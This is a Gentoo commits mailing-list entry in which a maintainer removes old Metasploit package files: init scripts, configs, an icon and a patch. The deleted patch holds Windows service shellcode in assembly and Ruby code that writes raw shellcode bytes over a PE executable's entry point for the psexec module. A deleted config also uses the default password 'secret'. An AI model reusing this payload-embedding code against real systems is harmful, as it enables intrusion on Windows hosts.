Gentoo Archives: gentoo-commits

From: Richard Farina <zerochaos@g.o>
To: gentoo-commits@l.g.o
Subject: [gentoo-commits] repo/gentoo:master commit in: net-analyzer/metasploit/, net-analyzer/metasploit/files/
Date: Sat, 03 Oct 2015 21:50:27
Message-Id: 1443908926.248567c601e0d19870b07268f20b857686ac088c.zerochaos@gentoo
1 commit: 248567c601e0d19870b07268f20b857686ac088c
2 Author: Zero_Chaos <zerochaos <AT> gentoo <DOT> org>
3 AuthorDate: Sat Oct 3 21:48:46 2015 +0000
4 Commit: Richard Farina <zerochaos <AT> gentoo <DOT> org>
5 CommitDate: Sat Oct 3 21:48:46 2015 +0000
6 URL: https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=248567c6
7
8 net-analyzer/metasploit: remove masked 2.7, drop some old files and prep new init scripts
9
10 Package-Manager: portage-2.2.21
11
12 net-analyzer/metasploit/Manifest | 1 -
13 .../metasploit/files/agix_psexec_pull-2657.patch | 219 --------------------
14 net-analyzer/metasploit/files/metasploit.icon | 224 ---------------------
15 net-analyzer/metasploit/files/msfrpcd-4.0-conf | 25 ---
16 net-analyzer/metasploit/files/msfrpcd-4.0-initd | 22 --
17 .../files/{msfrpcd-4.4-conf => msfrpcd-4.11-conf} | 0
18 .../{msfrpcd-4.3-initd => msfrpcd-4.11-initd} | 2 +-
19 net-analyzer/metasploit/files/msfrpcd-4.2-conf | 25 ---
20 net-analyzer/metasploit/files/msfrpcd-4.2-initd | 22 --
21 net-analyzer/metasploit/files/msfrpcd-4.3-conf | 25 ---
22 net-analyzer/metasploit/files/msfrpcd-4.4-initd | 22 --
23 net-analyzer/metasploit/files/msfweb.confd | 13 --
24 net-analyzer/metasploit/files/msfweb.initd | 18 --
25 net-analyzer/metasploit/metasploit-2.7.ebuild | 48 -----
26 14 files changed, 1 insertion(+), 665 deletions(-)
27
28 diff --git a/net-analyzer/metasploit/Manifest b/net-analyzer/metasploit/Manifest
29 index 7b154fd..d2acafb 100644
30 --- a/net-analyzer/metasploit/Manifest
31 +++ b/net-analyzer/metasploit/Manifest
32 @@ -1,2 +1 @@
33 -DIST framework-2.7.tar.gz 5800216 SHA256 516952772aaa8982628460b927c9119850925f870903c5a131a9c9f0390cf77f SHA512 a65740c81e6c711e6661170ec0dd87919cad6c4aa3aaac08fdaa72b4825be4bea28ec09c78f818ddab7660f5b485b13f87e3175b43c625319ce89b044a40f2a0 WHIRLPOOL f309608e30488484b24555fec84e65ed0dcbeba62a69e6ec23c507dbc0fcf720551a795e2a0793886fcd38d3a9b160819c864720155f58f274577b0246f05946
34 DIST metasploit-4.11.4_p2015090201.tar.gz 35211994 SHA256 1254dbb3e8cf33c7a6c8c701a0be13f78bbd2234503e636f1afacf88676aeea2 SHA512 b96c9735ef579b5f98d1fd7176f91bb1710d263a19d3ff891877df8e341baa1749d5fdce9825a19d9ecbe162b72ebcd11336d4d7884e066f4e199baaff8b4085 WHIRLPOOL 875db5df25112736dd62ec1195080d2567a670cf3a770e787b70c364c6b30b43bf906f7ba35901ff367ce940b02af7b17ae135693a28ff5fca9fc05038132ae2
35
36 diff --git a/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch b/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
37 deleted file mode 100644
38 index 4f2e353..0000000
39 --- a/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
40 +++ /dev/null
41 @@ -1,219 +0,0 @@
42 -diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
43 ---- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm 1970-01-01 01:00:00.000000000 +0100
44 -+++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm 2013-11-20 11:50:48.256366095 +0100
45 -@@ -0,0 +1,64 @@
46 -+;-----------------------------------------------------------------------------;
47 -+; Author: agix (florian.gaultier[at]gmail[dot]com)
48 -+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
49 -+; Size: 137 bytes
50 -+;-----------------------------------------------------------------------------;
51 -+
52 -+[BITS 32]
53 -+; Input: EBP must be the address of 'api_call'.
54 -+
55 -+push byte 0x0
56 -+push 0x32336970
57 -+push 0x61766461
58 -+push esp
59 -+push 0x726774c
60 -+call ebp ;load advapi32.dll
61 -+push 0x00454349
62 -+push 0x56524553
63 -+mov ecx, esp ;ServiceTableEntry.SVCNAME
64 -+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
65 -+push 0x00000000
66 -+push eax
67 -+push ecx
68 -+mov eax,esp
69 -+push 0x00000000
70 -+push eax
71 -+push 0xCB72F7FA
72 -+call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
73 -+push 0x00000000
74 -+push 0x56A2B5F0
75 -+call ebp ;call ExitProcess(0)
76 -+pop eax ;SvcCtrlHandler
77 -+pop eax
78 -+pop eax
79 -+pop eax
80 -+xor eax,eax
81 -+ret
82 -+cld ;SvcMain
83 -+call me
84 -+me:
85 -+pop ebp
86 -+sub ebp, 0xd6 ;ebp => hashFunction
87 -+push 0x00464349
88 -+push 0x56524553
89 -+mov ecx, esp ;SVCNAME
90 -+lea eax, [ebp+0xc9];SvcCtrlHandler
91 -+push 0x00000000
92 -+push eax
93 -+push ecx
94 -+push 0x5244AA0B
95 -+call ebp ;RegisterServiceCtrlHandlerExA
96 -+push 0x00000000
97 -+push 0x00000000
98 -+push 0x00000000
99 -+push 0x00000000
100 -+push 0x00000000
101 -+push 0x00000000
102 -+push 0x00000004
103 -+push 0x00000010
104 -+mov ecx, esp
105 -+push 0x00000000
106 -+push ecx
107 -+push eax
108 -+push 0x7D3755C6
109 -+call ebp ;SetServiceStatus RUNNING
110 -\ No newline at end of file
111 -diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
112 ---- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 1970-01-01 01:00:00.000000000 +0100
113 -+++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 2013-11-20 11:50:48.256366095 +0100
114 -@@ -0,0 +1,17 @@
115 -+;-----------------------------------------------------------------------------;
116 -+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
117 -+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
118 -+; Version: 1.0 (28 July 2009)
119 -+; Size: 189 bytes + strlen(libpath) + 1
120 -+; Build: >build.py single_service_stuff
121 -+;-----------------------------------------------------------------------------;
122 -+
123 -+[BITS 32]
124 -+[ORG 0]
125 -+
126 -+ cld ; Clear the direction flag.
127 -+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
128 -+%include "./src/block/block_api.asm"
129 -+start: ;
130 -+ pop ebp ; pop off the address of 'api_call' for calling later.
131 -+%include "./src/block/block_service.asm"
132 -\ No newline at end of file
133 -diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
134 ---- metasploit-9999.orig/lib/msf/util/exe.rb 2013-11-20 11:50:31.748365346 +0100
135 -+++ metasploit-9999/lib/msf/util/exe.rb 2013-11-20 11:50:48.256366095 +0100
136 -@@ -402,36 +402,86 @@
137 -
138 - case opts[:exe_type]
139 - when :service_exe
140 -+ exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
141 - max_length = 8192
142 - name = opts[:servicename]
143 -
144 -- if name
145 -- bo = pe.index('SERVICENAME')
146 -- raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
147 -- pe[bo, 11] = [name].pack('a11')
148 -+ if not name
149 -+ name = Rex::Text.rand_text_alpha(7)
150 - end
151 --
152 -- if not opts[:sub_method]
153 -- pe[136, 4] = [rand(0x100000000)].pack('V')
154 -+ #code_service could be encoded in the future
155 -+ code_service =
156 -+ "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
157 -+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
158 -+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
159 -+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
160 -+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
161 -+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
162 -+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
163 -+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
164 -+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
165 -+ "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
166 -+ "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
167 -+ "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
168 -+ "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
169 -+ "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
170 -+ "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
171 -+ "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
172 -+ "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
173 -+ "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
174 -+
175 -+ pe_header_size=0x18
176 -+ section_size=0x28
177 -+ characteristics_offset=0x24
178 -+ virtualAddress_offset=0xc
179 -+ sizeOfRawData_offset=0x10
180 -+
181 -+ sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
182 -+ sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
183 -+ sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
184 -+
185 -+ sections_header = []
186 -+ exe._file_header.v['NumberOfSections'].times { |i|
187 -+ sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
188 -+ }
189 -+
190 -+ #look for section with entry point
191 -+ sections_header.each do |sec|
192 -+ virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
193 -+ sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
194 -+ characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
195 -+ if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
196 -+ #put this section writable
197 -+ characteristics|=0x80000000
198 -+ newcharacteristics = [characteristics].pack('L')
199 -+ pe[sec[0],newcharacteristics.length]=newcharacteristics
200 -+ end
201 - end
202 -+
203 -+ #put the shellcode at the entry point, overwriting template
204 -+ pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
205 -+
206 - when :dll
207 - max_length = 2048
208 - when :exe_sub
209 - max_length = 4096
210 - end
211 -
212 -- bo = pe.index('PAYLOAD:')
213 -- raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
214 -+ if opts[:exe_type] != :service_exe
215 -
216 -- if (code.length <= max_length)
217 -- pe[bo, code.length] = [code].pack("a*")
218 -- else
219 -- raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
220 -- end
221 -+ bo = pe.index('PAYLOAD:')
222 -+ raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
223 -
224 -- if opts[:exe_type] == :dll
225 -- mt = pe.index('MUTEX!!!')
226 -- pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
227 -+ if (code.length <= max_length)
228 -+ pe[bo, code.length] = [code].pack("a*")
229 -+ else
230 -+ raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
231 -+ end
232 -+
233 -+ if opts[:exe_type] == :dll
234 -+ mt = pe.index('MUTEX!!!')
235 -+ pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
236 -+ end
237 - end
238 -
239 - return pe
240 -@@ -463,7 +513,7 @@
241 -
242 - def self.to_win32pe_service(framework, code, opts={})
243 - # Allow the user to specify their own service EXE template
244 -- set_template_default(opts, "template_x86_windows_svc.exe")
245 -+ set_template_default(opts, "template_x86_windows.exe")
246 - opts[:exe_type] = :service_exe
247 - exe_sub_method(code,opts)
248 - end
249 -diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
250 ---- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:31.988365357 +0100
251 -+++ metasploit-9999/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:48.256366095 +0100
252 -@@ -153,7 +153,7 @@
253 - # Disconnect from the ADMIN$
254 - simple.disconnect("ADMIN$")
255 - else
256 -- servicename = rand_text_alpha(8)
257 -+ servicename = rand_text_alpha(7)
258 -
259 - # Upload the shellcode to a file
260 - print_status("Uploading payload...")
261
262 diff --git a/net-analyzer/metasploit/files/metasploit.icon b/net-analyzer/metasploit/files/metasploit.icon
263 deleted file mode 100644
264 index 87af020..0000000
265 --- a/net-analyzer/metasploit/files/metasploit.icon
266 +++ /dev/null
267 @@ -1,224 +0,0 @@
268 -/* XPM */
269 -static char *metasploit[] = {
270 -/* columns rows colors chars-per-pixel */
271 -"48 48 170 2 ",
272 -" c #000000",
273 -". c #0B0B0B",
274 -"X c #131313",
275 -"o c #1C1C1C",
276 -"O c #251B0D",
277 -"+ c #2C2112",
278 -"@ c #2C241C",
279 -"# c #081933",
280 -"$ c #061F3B",
281 -"% c #07203C",
282 -"& c #09223C",
283 -"* c #232323",
284 -"= c #2D2D2D",
285 -"- c #353535",
286 -"; c #383838",
287 -": c #0C2141",
288 -"> c #0F264C",
289 -", c #0F284D",
290 -"< c #072755",
291 -"1 c #082754",
292 -"2 c #062855",
293 -"3 c #0E2C57",
294 -"4 c #072858",
295 -"5 c #0D2F5C",
296 -"6 c #033A6E",
297 -"7 c #1A3166",
298 -"8 c #043C72",
299 -"9 c #2F456F",
300 -"0 c #2A4174",
301 -"q c #314774",
302 -"w c #314A75",
303 -"e c #424242",
304 -"r c #444A5F",
305 -"t c #545454",
306 -"y c #5B5B5B",
307 -"u c #414B60",
308 -"i c #515A6F",
309 -"p c #4B6975",
310 -"a c #416679",
311 -"s c #46697B",
312 -"d c #4D6D7C",
313 -"f c #636363",
314 -"g c #686868",
315 -"h c #727272",
316 -"j c #7B7B7B",
317 -"k c #B37777",
318 -"l c #C76852",
319 -"z c #F26E40",
320 -"x c #C77A6F",
321 -"c c #DA8D75",
322 -"v c #023986",
323 -"b c #002F99",
324 -"n c #043296",
325 -"m c #043898",
326 -"M c #0038A0",
327 -"N c #094089",
328 -"B c #1C4583",
329 -"V c #194997",
330 -"C c #1E4E9F",
331 -"Z c #215192",
332 -"A c #225A9F",
333 -"S c #3D5C98",
334 -"D c #3B6F8A",
335 -"F c #0D43AD",
336 -"G c #1F4EA2",
337 -"H c #1F4EAA",
338 -"J c #1753BB",
339 -"K c #1852B9",
340 -"L c #224FA8",
341 -"P c #2450A4",
342 -"I c #2E55A0",
343 -"U c #2755AD",
344 -"Y c #2956AE",
345 -"T c #3464A5",
346 -"R c #2963BC",
347 -"E c #466E81",
348 -"W c #447082",
349 -"Q c #6C739A",
350 -"! c #4471B1",
351 -"~ c #4873B6",
352 -"^ c #4870BB",
353 -"/ c #4D78BA",
354 -"( c #0D53C3",
355 -") c #1866C9",
356 -"_ c #046EDB",
357 -"` c #126FD4",
358 -"' c #0C73DD",
359 -"] c #3767C7",
360 -"[ c #326AC2",
361 -"{ c #3D75C4",
362 -"} c #3574C8",
363 -"| c #3B74C9",
364 -" . c #3E79CC",
365 -".. c #2F74D3",
366 -"X. c #3B7BD0",
367 -"o. c #006EE5",
368 -"O. c #0479E5",
369 -"+. c #0074E9",
370 -"@. c #087EEC",
371 -"#. c #1479E1",
372 -"$. c #497AC7",
373 -"%. c #447BCD",
374 -"&. c #487FD2",
375 -"*. c #5B84A8",
376 -"=. c #3B82DA",
377 -"-. c #0C86EF",
378 -";. c #1F80E5",
379 -":. c #1393F9",
380 -">. c #1C99FB",
381 -",. c #348FEC",
382 -"<. c #3290E5",
383 -"1. c #3491EB",
384 -"2. c #2490F3",
385 -"3. c #279EFD",
386 -"4. c #3CA8FF",
387 -"5. c #5394D2",
388 -"6. c #758FC3",
389 -"7. c #689AD3",
390 -"8. c #7399D1",
391 -"9. c #4090E6",
392 -"0. c #4990E4",
393 -"q. c #4694EB",
394 -"w. c #559BED",
395 -"e. c #4B9BF1",
396 -"r. c #539FF3",
397 -"t. c #45A4FD",
398 -"y. c #47AAFA",
399 -"u. c #56A0F4",
400 -"i. c #5AA4F5",
401 -"p. c #5CA6F8",
402 -"a. c #56B5FD",
403 -"s. c #71A3E1",
404 -"d. c #65AFFB",
405 -"f. c #66B7FF",
406 -"g. c #68B7FF",
407 -"h. c #6CC2FF",
408 -"j. c #70C9FF",
409 -"k. c #7CD7FF",
410 -"l. c #7ED9FF",
411 -"z. c #838383",
412 -"x. c #8B8B8B",
413 -"c. c #939393",
414 -"v. c #9D9D9D",
415 -"b. c #B18A8B",
416 -"n. c #9193AB",
417 -"m. c #A3A3A3",
418 -"M. c #AEAEAE",
419 -"N. c #B2B2B2",
420 -"B. c #BDBDBD",
421 -"V. c #8299C5",
422 -"C. c #8899C3",
423 -"Z. c #81C2FF",
424 -"A. c #8BCEFF",
425 -"S. c #86D7FF",
426 -"D. c #8BD1FF",
427 -"F. c #84DCFF",
428 -"G. c #8ADFFF",
429 -"H. c #94D6FF",
430 -"J. c #9DDAFE",
431 -"K. c #8DE1FF",
432 -"L. c #97E0FF",
433 -"P. c #C3C3C3",
434 -"I. c #CBCBCB",
435 -"U. c #D3D3D3",
436 -"Y. c #DCDCDC",
437 -"T. c #E3E3E3",
438 -"R. c #ECECEC",
439 -"E. c #F4F4F4",
440 -"W. c #FFFFFF",
441 -"Q. c None",
442 -/* pixels */
443 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
444 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
445 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
446 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
447 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
448 -"Q.Q.Q.8 V P G G G G G G G G G P G G G G G G G G G G G G G G G G G G G G G G G G L V 6 Q.Q.Q.Q.Q.",
449 -"Q.v N A | &.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.| } .%. .} | %. .=.} A Z B Q.Q.Q.",
450 -"Q.F K ..q.u.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.i.p.u.e.u.p.p.w.w.s.8.$.] P 5 Q.Q.",
451 -"Q.R ) _ ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' #.d.Z.u.;.,.j.g.1./ k x ~ ( n 4 : Q.",
452 -"Q.` ' +.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.f.D.t.@.2.A.g.1.! l z Q J b 2 % Q.",
453 -"Q.O.-.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.>.h.D.a.3.4.D.j.y.5.b.c n.[ M 2 & Q.",
454 -"Q.<.a.F.l.k.k.k.k.k.l.l.k.k.k.k.k.k.k.k.k.l.k.k.k.k.k.k.k.k.l.K.K.G.l.F.L.K.F.S.H.J.L.0.m 1 & Q.",
455 -"Q.7.*.p d d d d d d d d d d d d d d d d d d d d d d d d d d d s a s d s a s s E D D W T G 3 $ Q.",
456 -"Q.C.r 7 Y 3 $ Q.",
457 -"Q.V.u 7 Y 3 $ Q.",
458 -"Q.V.u 7 Y 3 $ Q.",
459 -"Q.V.u 7 Y 3 % Q.",
460 -"Q.V.u c.R.W.Y. 7 Y 3 $ Q.",
461 -"Q.V.u g W.W.W.Y. 7 Y 3 $ Q.",
462 -"Q.V.u M.W.W.R.X 7 Y 3 $ Q.",
463 -"Q.V.u T.W.W.E.m.R.E.B.m.W.E.I.- . j U.E.W.P.e h E.W.W.W.c. . 7 Y 3 $ Q.",
464 -"Q.V.u W.W.W.W.W.W.W.W.W.W.W.W.R.X v.W.W.W.W.W.R. E.W.W.W.W.E. E.c.* 7 Y 3 $ Q.",
465 -"Q.V.u W.W.W.W.W.W.W.W.W.W.W.W.W.f E.W.W.R.X P.f h W.W.W.E.y W.W.W.N.e 7 Y 3 $ Q.",
466 -"Q.V.u W.W.W.E.= W.W.W.U.- W.W.W.v.P.W.W.W.U.- W.W.W.Y. o x.R.W.W.I.f . 7 Y 3 $ Q.",
467 -"Q.V.u W.W.W.Y. W.W.W.I. W.W.W.B.* Y.W.W.W.W.j W.W.W.Y. . f U.W.W.R.z. 7 Y 3 $ Q.",
468 -"Q.V.u W.W.W.Y. W.W.W.Y. W.W.W.U.g . f T.W.W.W.g W.W.W.Y. y W.W.W. 7 Y 3 & Q.",
469 -"Q.V.u W.W.W.Y. W.W.W.Y.. W.W.W.R.W.t ; W.W.W.M. W.W.W.Y. e N.W.W.W.m. 7 Y 3 $ Q.",
470 -"Q.V.u W.W.W.Y. W.W.W.Y.- W.W.W.Y.E.W.U.T.W.W.W.c. W.W.W.Y. . g U.W.W.R.z.o 7 Y 3 $ Q.",
471 -"Q.V.u W.W.W.Y. W.W.W.U.m.W.W.W.P.c.W.W.W.W.W.E.* W.W.W.R. R.W.W.U.f . 7 Y 3 $ Q.",
472 -"Q.V.u U.W.W.U. W.W.W.m.T.W.W.W.x.. c.R.W.E.N.= U.W.W.T. W.N.e 7 Y 3 $ Q.",
473 -"Q.V.u * 7 Y 3 $ Q.",
474 -"Q.V.u 7 Y 3 $ Q.",
475 -"Q.V.u 7 Y 3 $ Q.",
476 -"Q.V.u 7 Y 3 $ Q.",
477 -"Q.V.u 7 Y 3 $ Q.",
478 -"Q.V.u 7 Y 3 $ Q.",
479 -"Q.V.u 7 Y 3 $ Q.",
480 -"Q.V.u . . . . . . . . . . . . . 7 Y 3 $ Q.",
481 -"Q.6.i O @ @ @ @ + @ @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ @ @ + @ @ @ @ @ @ @ + @ @ @ @ @ + 0 H 3 & Q.",
482 -"Q.^ S 9 w w w w q w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w q I G 3 $ Q.",
483 -"Q.V V P C G C C C C P C C C C C P C C C C C C C C C C C C C C C C C C C C C C P A C P A B > $ Q.",
484 -"Q.3 1 > , > > > > > > > > > > > > > > > > > > > > > > > > > , , > > > > > > > > > > > > > & : Q.",
485 -"Q.Q.Q.Q.Q.# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Q.Q.Q.Q.",
486 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
487 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
488 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
489 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.",
490 -"Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q.Q."
491 -};
492
493 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.0-conf b/net-analyzer/metasploit/files/msfrpcd-4.0-conf
494 deleted file mode 100644
495 index dc56a9d..0000000
496 --- a/net-analyzer/metasploit/files/msfrpcd-4.0-conf
497 +++ /dev/null
498 @@ -1,25 +0,0 @@
499 -# Config file for /etc/init.d/msfrpcd
500 -
501 -# msfrpcd -h for more info
502 -
503 -# Bind to the following IP instead of 0.0.0.0
504 -MSF_OPTS="-a 127.0.0.1"
505 -
506 -# Bind to the following TCP port instead of default 55553
507 -#MSF_OPTS="${MSF_OPTS} -p 55553"
508 -
509 -# Specify the username to access msfrpcd
510 -MSF_OPTS="${MSF_OPTS} -U msf"
511 -
512 -# Specify the password to access msfrpcd
513 -MSF_OPTS="${MSF_OPTS} -P secret"
514 -
515 -# Server type, [Basic|Web]
516 -#MSF_OPTS="${MSF_OPTS} -t Basic"
517 -
518 -# URI for Web server
519 -#MSF_OPTS="${MSF_OPTS} -u "
520 -
521 -# Disable SSL on the XMLRPC socket
522 -# JAVA GUI doesn't support SSL as of Nov 6, 2010
523 -MSF_OPTS="${MSF_OPTS} -S"
524
525 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.0-initd b/net-analyzer/metasploit/files/msfrpcd-4.0-initd
526 deleted file mode 100644
527 index ad6bf25..0000000
528 --- a/net-analyzer/metasploit/files/msfrpcd-4.0-initd
529 +++ /dev/null
530 @@ -1,22 +0,0 @@
531 -#!/sbin/runscript
532 -# Copyright 1999-2011 Gentoo Foundation
533 -# Distributed under the terms of the GNU General Public License v2
534 -# $Id$
535 -
536 -VERSION=4.0
537 -PIDFILE=/var/run/msfrpcd${VERSION}.pid
538 -
539 -start() {
540 - ebegin "Starting msfrpcd${VERSION}"
541 - start-stop-daemon --start --quiet --background \
542 - --exec /usr/lib/metasploit${VERSION}/msfrpcd \
543 - --pidfile ${PIDFILE} \
544 - --make-pidfile -- -f ${MSF_OPTS}
545 - eend $?
546 -}
547 -
548 -stop() {
549 - ebegin "Stopping msfrpcd${VERSION}"
550 - start-stop-daemon --stop --quiet -s 9 --pidfile ${PIDFILE}
551 - eend $?
552 -}
553
554 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.4-conf b/net-analyzer/metasploit/files/msfrpcd-4.11-conf
555 similarity index 100%
556 rename from net-analyzer/metasploit/files/msfrpcd-4.4-conf
557 rename to net-analyzer/metasploit/files/msfrpcd-4.11-conf
558
559 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.3-initd b/net-analyzer/metasploit/files/msfrpcd-4.11-initd
560 similarity index 97%
561 rename from net-analyzer/metasploit/files/msfrpcd-4.3-initd
562 rename to net-analyzer/metasploit/files/msfrpcd-4.11-initd
563 index 4880d50..2b8a4cd 100644
564 --- a/net-analyzer/metasploit/files/msfrpcd-4.3-initd
565 +++ b/net-analyzer/metasploit/files/msfrpcd-4.11-initd
566 @@ -3,7 +3,7 @@
567 # Distributed under the terms of the GNU General Public License v2
568 # $Id$
569
570 -VERSION=4.3
571 +VERSION=4.11
572 PIDFILE=/var/run/msfrpcd${VERSION}.pid
573
574 start() {
575
